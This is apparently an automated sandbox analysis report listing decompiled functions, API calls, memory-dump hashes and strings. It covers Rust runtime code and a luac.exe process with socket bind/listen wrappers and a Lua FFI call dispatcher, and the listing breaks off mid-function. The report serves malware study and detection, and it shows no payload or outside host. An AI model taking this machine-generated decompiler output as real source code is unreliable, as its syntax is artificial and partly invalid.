<locked>overflow when adding duration to instant, xrefs: 00007FF7BF72A75C
attempt to divide by zero, xrefs: 00007FF7BF72A6D7

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID: <locked>overflow when adding duration to instant$attempt to divide by zero$called `Result::unwrap()` on an `Err` valueC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\zip-0.5.13\src\cp437.rs
API String ID: 1452528299-3577697488
Opcode ID: 47fe645c3bc527217ed61a9ee33c26d1ad2fc9d586d8a956c6c4e3b267b0c62f
Instruction ID: cbc573ac66e51c0fb1ea34cfff36e6357835aa97234fc7ef129616210344e894
Opcode Fuzzy Hash: 47fe645c3bc527217ed61a9ee33c26d1ad2fc9d586d8a956c6c4e3b267b0c62f
Instruction Fuzzy Hash: 7241D27AB086C246FB14AB98D8443F9E256FB6AF80FC14072DB0E47A98DF3CE5558750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF67B880, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7BF67B96A
HeapAlloc.KERNEL32 ref: 00007FF7BF67B977

Strings

capacity overflow, xrefs: 00007FF7BF67B884
a formatting trait implementation returned an error, xrefs: 00007FF7BF67BA05

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess
String ID: a formatting trait implementation returned an error$capacity overflow
API String ID: 1617791916-1970601451
Opcode ID: 61152acfb019d95bbd30f6f21f3cb2563310b9074a496edb00c1c94cbd296dc8
Instruction ID: 83e4e8bae0298bf90af772ddf5e506b3e680b4f1ca3371115253b1cd48e305ab
Opcode Fuzzy Hash: 61152acfb019d95bbd30f6f21f3cb2563310b9074a496edb00c1c94cbd296dc8
Instruction Fuzzy Hash: 2141A566A085C541FE54AB9CE4413E9A355EF66B6CF884231DF6D022DEDE3DE582C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF6AE4B9, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7BF6AE560

Part of subcall function 00007FF7BF6AE6D3: SwitchToThread.KERNEL32(?,?,?,00000608,00007FF7BF6E168D,?,?,?,?,?,?,00000038,?,00000030,00000000,00007FF7BF6E15A7), ref: 00007FF7BF6AE6F2

Part of subcall function 00007FF7BF6AE74B: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00007FF7BF672A74,?,?,?,?,?,?,?,00007FF7BF6722D9), ref: 00007FF7BF6AE75A

Strings

assertion failed: (*next).value.is_some(), xrefs: 00007FF7BF6AE688
assertion failed: (*tail).value.is_none(), xrefs: 00007FF7BF6AE678

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: SwitchThread$AcquireExclusiveLock
String ID: assertion failed: (*next).value.is_some()$assertion failed: (*tail).value.is_none()
API String ID: 250121282-1927134345
Opcode ID: 29f564b125c6c7e1b88170915922083d134d83936b8ed9a417a439714534d530
Instruction ID: cbfb0229aecc2083d4c99723eb9d8c50fb04b0a550e0a30412d33c74b587accd
Opcode Fuzzy Hash: 29f564b125c6c7e1b88170915922083d134d83936b8ed9a417a439714534d530
Instruction Fuzzy Hash: 1051712190AAC581FA26AB5DE0163F8A3A5FFB6B48F845531EF8C02355EF3DE595C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF6AE6D3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32(?,?,?,00000608,00007FF7BF6E168D,?,?,?,?,?,?,00000038,?,00000030,00000000,00007FF7BF6E15A7), ref: 00007FF7BF6AE6F2

Strings

assertion failed: (*next).value.is_some(), xrefs: 00007FF7BF6AE731
assertion failed: (*tail).value.is_none(), xrefs: 00007FF7BF6AE721

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: SwitchThread
String ID: assertion failed: (*next).value.is_some()$assertion failed: (*tail).value.is_none()
API String ID: 115865932-1927134345
Opcode ID: 3d0ceba21c4a4d9bc0d373bf6e63976faad31d1ee1f49c5fdc39d3d8880aac7b
Instruction ID: 2f48187d4c7652a963c119de58c7ca540ae71eaedfc91dfe55c95966c22a9dae
Opcode Fuzzy Hash: 3d0ceba21c4a4d9bc0d373bf6e63976faad31d1ee1f49c5fdc39d3d8880aac7b
Instruction Fuzzy Hash: 4F011E25A0AED681FA54BBDED4443F89295AB76F48FD58431CB0C07698DE3CE891D320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF7197C0, Relevance: 5.1, APIs: 4, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00007FF7BF719654), ref: 00007FF7BF7198D1
HeapReAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00007FF7BF719654), ref: 00007FF7BF7198E6
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00007FF7BF719654), ref: 00007FF7BF719902
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7BF719654), ref: 00007FF7BF719955

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: f1d6b8160dd306c5f83a7fe8dabad2a98936cfb66018f29de2b6e6efcda25532
Instruction ID: 139d7099477a842e30be4634bcf6bf621896a68533d5c90af776ee00b7bcd761
Opcode Fuzzy Hash: f1d6b8160dd306c5f83a7fe8dabad2a98936cfb66018f29de2b6e6efcda25532
Instruction Fuzzy Hash: 7541DF36A08AC241EB65AB49A0403E9E371EB9AF94FD48070DBCD0779DDF7DE5468710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF67B800, Relevance: 5.0, APIs: 4, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7BF67B81C
HeapReAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7BF67B82C
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7BF67B83D
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7BF67B84A

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 7f6b80afc35c49ab56ba00ee194234ede6d767f76e7f557bf6b44b2586a99c9b
Instruction ID: 0f0b33d8691495ac0f26402d721f8f5a8fdef7cfea04e5d774256110f49d214e
Opcode Fuzzy Hash: 7f6b80afc35c49ab56ba00ee194234ede6d767f76e7f557bf6b44b2586a99c9b
Instruction Fuzzy Hash: EF017522A0968241F72476DA65407F9D1D69F66F88F998035DF5C437DEFE7CA4814310

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: luac.exe PID: 1384 Parent PID: 528 luac.exeCOMMON

Executed Functions

Function 009942F0, Relevance: 3.0, APIs: 2, Instructions: 25
networkCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E009942F0(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;
				intOrPtr _t10;
				intOrPtr* _t11;

				_t11 = _a4;
				_t10 = 0;
				E00994630(_t11);
				_t5 = _a12;
				_push(_t5);
				_push(_a8);
				_push( *_t11); // executed
				L00994A7C(); // executed
				if(_t5 < 0) {
					L00994A52();
					_t10 = _t5;
				}
				E00994660(_t11);
				return _t10;
			}

0x009942f1
0x009942f7
0x009942f9
0x009942fe
0x0099430b
0x0099430c
0x0099430d
0x0099430e
0x00994315
0x00994317
0x0099431c
0x0099431c
0x0099431f
0x0099432b

APIs

Part of subcall function 00994630: ioctlsocket.WSOCK32(?,8004667E,00000002), ref: 0099464A

bind.WSOCK32(?,?,00000010), ref: 0099430E
WSAGetLastError.WSOCK32 ref: 00994317

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastbindioctlsocket
String ID:
API String ID: 1498457153-0
Opcode ID: 036a3ca83df02386473efc216931957ab9d482023ddd03f044f9ba79ee1770b9
Instruction ID: 43819f958602a1b896f43700ffab6cd3aab9d9c253f093a1a1fda37b675fd256
Opcode Fuzzy Hash: 036a3ca83df02386473efc216931957ab9d482023ddd03f044f9ba79ee1770b9
Instruction Fuzzy Hash: 63E086F6601110679A01EA2DFC42E6F229D9EC5314B050438F844C3205EA20EC0787F3

Uniqueness

Uniqueness Score: -1.00%

Function 00994330, Relevance: 3.0, APIs: 2, Instructions: 23
networkCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00994330(intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _t4;
				intOrPtr _t8;
				intOrPtr* _t9;

				_t9 = _a4;
				_t8 = 0;
				E00994630(_t9);
				_t4 = _a8;
				_push(_t4);
				_push( *_t9); // executed
				L00994A82(); // executed
				if(_t4 < 0) {
					L00994A52();
					_t8 = _t4;
				}
				E00994660(_t9);
				return _t8;
			}

0x00994331
0x00994337
0x00994339
0x0099433e
0x00994347
0x00994348
0x00994349
0x00994350
0x00994352
0x00994357
0x00994357
0x0099435a
0x00994366

APIs

Part of subcall function 00994630: ioctlsocket.WSOCK32(?,8004667E,00000002), ref: 0099464A

listen.WSOCK32(?,?), ref: 00994349
WSAGetLastError.WSOCK32 ref: 00994352

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastioctlsocketlisten
String ID:
API String ID: 704306598-0
Opcode ID: 48f19a2327ce642a48d6359df9d0350830f583754c4cd02f66291cff23980f04
Instruction ID: fdb87c21ee8f51835d3efbda475d58f6489bc604daf60af1d3a682102968ea34
Opcode Fuzzy Hash: 48f19a2327ce642a48d6359df9d0350830f583754c4cd02f66291cff23980f04
Instruction Fuzzy Hash: BBD012A660111057AE02AA2DBD42E6F229D9EC1354B090438F955D7201F920DD0746B3

Uniqueness

Uniqueness Score: -1.00%

Function 00A21EF0, Relevance: 72.3, APIs: 33, Strings: 8, Instructions: 559
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00A21EF0(long long __fp0, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v18;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char _v72;
				signed int _v76;
				char _v80;
				signed int _v84;
				char _v88;
				signed int _v92;
				long long _v100;
				void* _v112;
				long long* __ebx;
				void* __edi;
				void* __esi;
				signed int _t261;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				char* _t266;
				signed int _t277;
				signed int _t282;
				char* _t283;
				signed int _t292;
				char* _t306;
				char* _t307;
				signed int _t309;
				void* _t310;
				void* _t311;
				intOrPtr* _t312;
				signed int _t313;
				signed int _t314;
				signed int _t324;
				char _t335;
				signed int _t336;
				signed int _t337;
				intOrPtr _t338;
				signed int _t339;
				void* _t340;
				void* _t341;
				void* _t342;
				signed int _t343;
				void* _t344;
				long long _t368;

				_t368 = __fp0;
				_t261 =  *0xa270f8; // 0x48cba2b9
				_v8 = _t261 ^ _t339;
				_t338 = _a4;
				_t263 = E00A21110(_t261 ^ _t339, 1, _t338, "alien_function");
				_t341 = _t340 + 4;
				if(_t263 == 0) {
					_t263 = E00A21110(_t263, 1, _t338, "alien_callback");
					_t342 = _t341 + 4;
					if(_t263 == 0) {
						_push("alien function or callback expected");
						_push(1);
						_push(_t338);
						L00A23F14();
						_t342 = _t342 + 0xc;
						_t309 = 0;
					} else {
						_t263 =  *_t263;
						_t309 =  *((intOrPtr*)(_t263 + 0x18));
					}
					_v24 = _t309;
				} else {
					_t309 = _t263;
					_v24 = _t263;
				}
				_t335 =  *((intOrPtr*)(_t309 + 0x2c));
				_push(_t338);
				_v72 = _t335;
				L00A23F38();
				_t264 = _t263 - 1;
				_t343 = _t342 + 4;
				_v16 = _t264;
				if(_t264 >= _t335) {
					if(_v16 <= _t335) {
						goto L15;
					}
					_t306 =  *(_t309 + 8);
					if(_t306 == 0) {
						_t306 = "anonymous";
					}
					_push(_t306);
					_push("alien: too many arguments (function %s)");
					goto L14;
				} else {
					_t307 =  *(_t309 + 8);
					if(_t307 == 0) {
						_t307 = "anonymous";
					}
					_push(_t307);
					_push("alien: too few arguments (function %s)");
					L14:
					_push(_t338);
					L00A23F26();
					_t343 = _t343 + 0xc;
					L15:
					_t313 = 0;
					_t326 = 0;
					_v76 = 0;
					_v60 = 0;
					_v56 = 0;
					_v52 = 0;
					if(_t335 <= 0) {
						L32:
						if(_v16 <= 0) {
							_t336 = _v84;
						} else {
							E00A24670(_v16 + _v16 + _v16 + _v16);
							_t336 = _t343;
						}
						_t310 = 2;
						if(_v72 <= 0) {
							L74:
							_t314 = _v24;
							_v64 = 0;
							_t265 =  *(_t314 + 0xc);
							if(_t265 > 0xc) {
								_t266 =  *(_t314 + 8);
								if(_t266 == 0) {
									_t266 = "anonymous";
								}
								_push(_t266);
								_push("alien: unknown return type (function %s)");
								_push(_t338);
								L00A23F26();
								L98:
								_t344 = _t343 + 0xc;
								L99:
								_t311 = _v68 +  ~_v56 * 8;
								_v40 = _v40 +  ~_v76 * 4;
								_v48 = _v48 - _v52;
								_t337 = 0;
								_v44 = _v44 +  ~_v60 * 4;
								if(_v72 <= 0) {
									L109:
									return E00A245A4(_v52 + _v56 + _v60 + _v76 + 1, _t311, _v8 ^ _t339, _v76, _t337, _t338);
								} else {
									goto L100;
								}
								do {
									L100:
									_t277 =  *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x30)) + _t337 * 4)) + 0xfffffff3;
									if(_t277 > 3) {
										goto L108;
									}
									switch( *((intOrPtr*)(_t277 * 4 +  &M00A228F8))) {
										case 0:
											asm("fild dword [ecx]");
											_t346 = _t344 - 8;
											 *_t346 = _t368;
											_push(_t338);
											L00A23F80();
											_t344 = _t346 + 0xc;
											_v40 = _v40 + 4;
											goto L108;
										case 1:
											__edx = _v44;
											__eax =  *__edx;
											asm("fild dword [edx]");
											if(__eax < 0) {
												__fp0 = __fp0 +  *0xa25878;
											}
											__esp = __esp - 8;
											 *__esp = __fp0;
											_push(__esi);
											L00A23F80();
											__esp = __esp + 0xc;
											_v44 = _v44 + 4;
											goto L108;
										case 2:
											__ecx = _v48;
											__edx =  *__ecx;
											_v28 = __edx;
											__esp = __esp - 8;
											asm("fild dword [ebp-0x18]");
											 *__esp = __fp0;
											_push(__esi);
											L00A23F80();
											__esp = __esp + 0xc;
											_v48 = _v48 + 1;
											goto L108;
										case 3:
											__fp0 =  *__ebx;
											__esp = __esp - 8;
											 *__esp = __fp0;
											_push(__esi);
											L00A23F80();
											__esp = __esp + 0xc;
											__ebx = __ebx + 8;
											goto L108;
									}
									L108:
									_t337 = _t337 + 1;
								} while (_t337 < _v72);
								goto L109;
							}
							switch( *((intOrPtr*)(_t265 * 4 +  &M00A228C4))) {
								case 0:
									__eax = _v24;
									__ecx =  *(__eax + 4);
									__edx =  &_v36;
									__eax = __eax + 0x10;
									__eax = E00A24130(__ebx,  &_v36, __edi, __fp0, __eax,  *(__eax + 4),  &_v36, __edi);
									__edx = _v36;
									_v28 = __edx;
									__esp = __esp + 8;
									asm("fild dword [ebp-0x18]");
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									goto L98;
								case 1:
									__eax = _v24;
									__ecx =  *(__eax + 4);
									_t180 =  &_v36; // -28
									__edx = _t180;
									__eax = __eax + 0x10;
									__eax = E00A24130(__ebx, _t180, __edi, __fp0, __eax,  *(__eax + 4), _t180, __edi);
									__edx = _v36 & 0x0000ffff;
									_v28 = __edx;
									__esp = __esp + 8;
									asm("fild dword [ebp-0x18]");
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									goto L98;
								case 2:
									__eax = _v24;
									__ecx =  *(__eax + 4);
									_t177 =  &_v36; // -28
									__edx = _t177;
									__eax = __eax + 0x10;
									__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi); // executed
									asm("fild dword [ebp-0x20]");
									__esp = __esp + 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									goto L98;
								case 3:
									_t187 =  &_v36; // -28
									__eax = _t187;
									__eax = _v24;
									__ecx =  *(__eax + 4);
									__eax = __eax + 0x10;
									__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t187, __edi);
									asm("fild dword [ebp-0x20]");
									__edx = _v36;
									goto L82;
								case 4:
									_t172 =  &_v88; // -80
									__eax = _t172;
									__eax = _v24;
									__ecx =  *(__eax + 4);
									__eax = __eax + 0x10;
									__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t172, __edi);
									asm("fild dword [ebp-0x54]");
									__esp = __esp + 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									goto L98;
								case 5:
									_t183 =  &_v92; // -84
									__eax = _t183;
									__eax = _v24;
									__ecx =  *(__eax + 4);
									__eax = __eax + 0x10;
									__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t183, __edi);
									asm("fild dword [ebp-0x58]");
									__edx = _v92;
									L82:
									if(__edx < 0) {
										__fp0 = __fp0 +  *0xa25878;
									}
									__esp = __esp + 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									goto L98;
								case 6:
									E00A24130(_t310, _t326, _t336, _t368, _v24 + 0x10,  *((intOrPtr*)(_v24 + 4)), 0, _t336);
									_push(_t338);
									L00A23F74();
									_t344 = _t343 + 0x14;
									goto L99;
								case 7:
									_t201 =  &_v84; // -76
									__eax = _t201;
									__eax = _v24;
									__ecx =  *(__eax + 4);
									__eax = __eax + 0x10;
									__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t201, __edi);
									__fp0 = _v84;
									__esp = __esp + 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									goto L98;
								case 8:
									__eax = _v24;
									__ecx =  *(__eax + 4);
									_t207 =  &_v100; // -92
									__edx = _t207;
									__eax = __eax + 0x10;
									__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
									__fp0 = _v100;
									__esp = __esp + 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									goto L98;
								case 9:
									_t191 =  &_v36; // -28
									__eax = _t191;
									__eax = _v24;
									__ecx =  *(__eax + 4);
									__eax = __eax + 0x10;
									__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t191, __edi);
									__edx = _v36 & 0x000000ff;
									_v28 = __edx;
									__esp = __esp + 8;
									asm("fild dword [ebp-0x18]");
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									goto L98;
								case 0xa:
									_t196 =  &_v36; // -28
									__eax = _t196;
									__eax = _v24;
									__ecx =  *(__eax + 4);
									__eax = __eax + 0x10;
									__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t196, __edi);
									__edx = _v36;
									_v28 = __edx;
									__esp = __esp + 8;
									asm("fild dword [ebp-0x18]");
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									goto L98;
								case 0xb:
									__eax = _v24;
									__ecx =  *(__eax + 4);
									_t211 =  &_v64; // -56
									__edx = _t211;
									__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
									__eax = _v64;
									if(__eax == 0) {
										goto L92;
									}
									_push(__eax);
									_push(__esi);
									L00A23EF0();
									__esp = __esp + 8;
									goto L99;
								case 0xc:
									__eax = _v24;
									__ecx =  *(__eax + 4);
									_t215 =  &_v64; // -56
									__edx = _t215;
									__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
									__eax = _v64;
									if(__eax == 0) {
										L92:
										_push(__esi);
										L00A23F74();
										__esp = __esp + 4;
										goto L99;
									}
									_push(__eax);
									_push(__esi);
									L00A23F7A();
									__esp = __esp + 8;
									goto L99;
							}
						} else {
							_v16 = 0;
							_v80 = _v72;
							do {
								_t324 = _v24;
								_t326 =  *((intOrPtr*)(_t324 + 0x30));
								_t282 =  *(_v16 +  *((intOrPtr*)(_t324 + 0x30)));
								if(_t282 > 0x11) {
									L70:
									_t283 =  *(_t324 + 8);
									if(_t283 == 0) {
										_t283 = "anonymous";
									}
									_push(_t283);
									_push(_t310);
									_push("alien: parameter %i is of unknown type (function %s)");
									_push(_t338);
									L00A23F26();
									_t343 = _t343 + 0x10;
									goto L73;
								}
								switch( *((intOrPtr*)(_t282 * 4 +  &M00A2287C))) {
									case 0:
										_t285 = E00A246A0(4);
										_v12 = _t343;
										_push(_t310);
										_push(_t338);
										L00A23F68();
										_t343 = _t343 + 8;
										_t286 = E00A245C0(_t285, _t368);
										_t325 = _v12;
										_t326 = _v16;
										 *_t325 = _t286;
										 *((intOrPtr*)(_v16 + _t336)) = _t325;
										goto L73;
									case 1:
										4 = E00A246A0(4);
										_v12 = __esp;
										_push(__ebx);
										_push(__esi);
										L00A23F68();
										asm("fnstcw word [ebp-0xe]");
										__eax = _v18 & 0x0000ffff;
										__edx = _v16;
										__esp = __esp + 8;
										__eax = _v18 & 0x0000ffff | 0x00000c00;
										_v28 = _v18 & 0x0000ffff | 0x00000c00;
										__eax = _v12;
										asm("fldcw word [ebp-0x18]");
										asm("fistp dword [ebp-0x18]");
										 *__eax = _v28;
										 *(__edx + __edi) = __eax;
										asm("fldcw word [ebp-0xe]");
										goto L73;
									case 2:
										__eax = 4;
										__eax = E00A246A0(4);
										_v12 = __esp;
										_push(__ebx);
										_push(__esi);
										L00A23F68();
										__esp = __esp + 8;
										__eax = E00A245C0(__eax, __fp0);
										__ecx = _v12;
										__edx = _v16;
										 *__ecx = __eax;
										 *(__edx + __edi) = __ecx;
										goto L73;
									case 3:
										4 = E00A246A0(4);
										_v12 = __esp;
										_push(__ebx);
										_push(__esi);
										L00A23F68();
										asm("fnstcw word [ebp-0xe]");
										__eax = _v18 & 0x0000ffff;
										__edx = _v16;
										__esp = __esp + 8;
										__eax = _v18 & 0x0000ffff | 0x00000c00;
										_v28 = _v18 & 0x0000ffff | 0x00000c00;
										__eax = _v12;
										asm("fldcw word [ebp-0x18]");
										asm("fistp qword [ebp-0x1c]");
										__ecx = _v32;
										 *__eax = __ecx;
										 *(__edx + __edi) = __eax;
										asm("fldcw word [ebp-0xe]");
										goto L73;
									case 4:
										__eax = 4;
										__eax = E00A246A0(4);
										_v12 = __esp;
										_push(__ebx);
										_push(__esi);
										L00A23F68();
										__esp = __esp + 8;
										__eax = E00A245C0(__eax, __fp0);
										__ecx = _v12;
										 *__ecx = __eax;
										__eax = _v16;
										 *(__eax + __edi) = __ecx;
										goto L73;
									case 5:
										4 = E00A246A0(4);
										_v12 = __esp;
										_push(__ebx);
										_push(__esi);
										L00A23F68();
										asm("fnstcw word [ebp-0xe]");
										__eax = _v18 & 0x0000ffff;
										__edx = _v16;
										__esp = __esp + 8;
										__eax = _v18 & 0x0000ffff | 0x00000c00;
										_v28 = _v18 & 0x0000ffff | 0x00000c00;
										__eax = _v12;
										asm("fldcw word [ebp-0x18]");
										asm("fistp qword [ebp-0x1c]");
										__ecx = _v32;
										 *__eax = __ecx;
										 *(__edx + __edi) = __eax;
										asm("fldcw word [ebp-0xe]");
										goto L73;
									case 6:
										goto L70;
									case 7:
										4 = E00A246A0(4);
										_v12 = __esp;
										_push(__ebx);
										_push(__esi);
										L00A23F68();
										__eax = _v12;
										__ecx = _v16;
										 *__eax = __fp0;
										__esp = __esp + 8;
										 *(__ecx + __edi) = __eax;
										goto L73;
									case 8:
										8 = E00A24686(8);
										_v12 = __esp;
										_push(__ebx);
										_push(__esi);
										L00A23F68();
										__eax = _v12;
										__edx = _v16;
										 *__eax = __fp0;
										__esp = __esp + 8;
										 *(__edx + __edi) = __eax;
										goto L73;
									case 9:
										4 = E00A246A0(4);
										_v12 = __esp;
										_push(__ebx);
										_push(__esi);
										L00A23F62();
										__ecx = _v12;
										 *__ecx = __al;
										__eax = _v16;
										__esp = __esp + 8;
										 *(__eax + __edi) = __ecx;
										goto L73;
									case 0xa:
										__eax = 4;
										__eax = E00A246A0(4);
										_v12 = __esp;
										_push(__ebx);
										_push(__esi);
										L00A23F62();
										__ecx = _v12;
										__edx = _v16;
										 *__ecx = __al;
										__esp = __esp + 8;
										 *(__edx + __edi) = __ecx;
										goto L73;
									case 0xb:
										__eax = 4;
										__eax = E00A246A0(4);
										_v12 = __esp;
										_push(__ebx);
										_push(__esi);
										L00A23F50();
										__esp = __esp + 8;
										_push(__ebx);
										_push(__esi);
										if(__eax == 0) {
											L00A23F4A();
											__esp = __esp + 8;
											if(__eax != 0) {
												_push(0);
												_push(__ebx);
												_push(__esi);
												L00A23F5C();
												__edx = _v12;
												__ecx = _v16;
												 *__edx = __eax;
												__eax = __edx;
												__esp = __esp + 0xc;
												 *(__ecx + __edi) = __eax;
											} else {
												__edx = _v12;
												__ecx = _v16;
												 *__edx = __eax;
												__eax = __edx;
												 *(__ecx + __edi) = __eax;
											}
										} else {
											L00A23F4A();
											__esp = __esp + 8;
											if(__eax != 0) {
												_push(__ebx);
												_push(__esi);
												L00A23F0E();
												__ecx = _v12;
												 *__ecx = __eax;
												__eax = __ecx;
												__ecx = _v16;
												__esp = __esp + 8;
												 *(__ecx + __edi) = __eax;
											} else {
												__ecx = _v12;
